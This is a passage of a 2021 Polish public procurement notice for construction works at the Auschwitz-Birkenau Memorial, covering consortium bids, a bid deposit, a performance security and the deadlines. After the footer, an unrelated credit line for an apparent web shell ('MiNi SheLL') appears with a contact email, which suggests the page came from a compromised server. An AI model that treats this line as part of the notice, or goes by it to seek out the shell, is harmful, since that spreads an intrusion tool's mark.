uczestniczył.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykonawcy wspólnie ubiegający się o zamówienie (konsorcjum) dołączają do oferty oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp (wzór stanowi Załącznik nr 6 do SWZ), w którym wskażą, które roboty zostaną wykonane przez poszczególnych wykonawców w odniesieniu do spełnienia, określonego w pkt 3.1. Dział V SWZ warunku udziału w postępowaniu w zakresie doświadczenia wykonawców.2. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie* podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia (wzór stanowi Załącznik nr 8 do SWZ) lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.3. Wykaz dodatkowego doświadczenia osób skierowanych do realizacji zamówienia (Załącznik nr 1 do Formularza oferty), zawierający oświadczenie Wykonawcy w zakresie Kryterium nr 2, który należy złożyć wraz z ofertą, w ten sam sposób i w takiej samej formie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca przystępujący do niniejszego postępowania jest zobowiązany wnieść wadium w wysokości 10.000,00 zł na okres związania ofertą. Wymagania dotyczące wadium zawarto w Dziale XIII SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielnie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwa winny być załączone do oferty.W przypadku Wykonawców wspólnie ubiegających się o udzielenia zamówienia dołączają do oferty Oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy.(Wzór stanowi Załącznik nr 6 do SWZ).Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą na trzy dni przed zawarciem umowy w sprawie zamówienia publicznego są zobowiązani przedstawić zamawiającemu stosowną umowę regulującą współpracę tych Wykonawców występujących wspólnie, zawierającą w swojej treści postanowienia określone w Dziale XXII pkt 3 SWZ.2. Zamawiający uzna warunek udziału w postępowaniu w zakresie doświadczenia Wykonawców (Dział V pkt 3.1.SWZ) za spełniony:- w przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), jeżeli co najmniej jeden z uczestników konsorcjum, zgodnie z art. 117 ust. 1 ustawy Pzp, wykaże się na zasadach określonych w art. 118 ustawy Pzp należytą realizacją:- co najmniej dwóch umów/zamówień łącznie obejmujących swoim zakresem wymagania określone w od pkt 3.1.1. do pkt 3.1.3. lub co najmniej dwóch umów/zamówień łącznie obejmujących swoim zakresem wymagania określone w od pkt 3.1.4. do pkt 3.1.6.;3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) warunek udziału w postępowaniu w zakresie w zakresie kwalifikacji zawodowych, określony w pkt 3.2. Dział V SWZ, zostanie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o zamówienie potwierdzi, iż spełnia ww. warunek albo wykonawcy łącznie wykażą dysponowanie osobami.4.	W odniesieniu do określonych warunków udziału w postępowaniu wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum) mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.4.1. Wykonawcy wspólnie ubiegający się o zamówienie (konsorcjum) dołączają do oferty oświadczenie*, o którym mowa w art. 117 ust. 4 ustawy Pzp (wzór stanowi Załącznik nr 6 do SWZ), w którym wskażą, które roboty zostaną wykonane przez poszczególnych wykonawców w odniesieniu do spełnienia, określonego w pkt 3.1. warunku udziału w postępowaniu w zakresie doświadczenia wykonawców.*należy złożyć w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę upoważnioną do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszczalne zmiany umowy zostały zamieszczone w § 21 Wzoru umowy (Załącznik nr 7 do SWZ). Zamawiający przewiduje możliwość zmiany terminów realizacji przedmiotu umowy, zmiany osób, na zasadach szczegółowo opisanych we Wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem -Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-10 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-08</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Wykonawca przystępujący do niniejszego postępowania jest zobowiązany wnieść wadium w wysokości 10.000,00 zł na okres związania ofertą.	Wadium może być wnoszone w jednej lub kilku następujących formach:1.	Pieniądzu,2.	Gwarancjach bankowych, 3.	Gwarancjach ubezpieczeniowych, 4.	Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.II. Zamawiający żąda od Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, wniesienia zabezpieczenia należytego wykonania umowy w wysokości 10% ceny całkowitej brutto podanej w ofercie.Określenie zabezpieczenia należytego wykonania umowy wysokości 10% ceny brutto całkowitej podanej w ofercie Zamawiający uzasadnia wyjątkową wartością historyczną obiektów byłego niemieckiego nazistowskiego obozu koncentracyjnego i zagłady Auschwitz – Birkenau i znaczenia Miejsca Pamięci Auschwitz-Birkenau, wpisanego na Listę Światowego Dziedzictwa UNESCO i do rejestru zabytków.Wraz z ofertą, składaną na Formularzu oferty (Załącznik nr 1 do SWZ)wraz z Załącznikiem nr 1 do Formularza oferty, stanowiącym Wykaz dodatkowego doświadczenia osób skierowanych do realizacji zamówienia, dotyczącym Kryterium oceny ofert nr 2,należy złożyć:1.	Pełnomocnictwo (jeśli dotyczy)2.	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art. 117 ust. 4 ustawy Pzp dotyczące realizacji przez nich zakresów przedmiotu umowy, zgodnie z Działem XXIII SWZ (jeżeli dotyczy);3.	Oświadczenie (oświadczenia) z art. 125 ust. 1 Pzp;4.	Wykaz osób (Załącznik nr 5 do SWZ);5.	Zobowiązanie innego podmiotu (jeżeli dotyczy);6.	Dowód wniesienia wadium.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-04-23 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com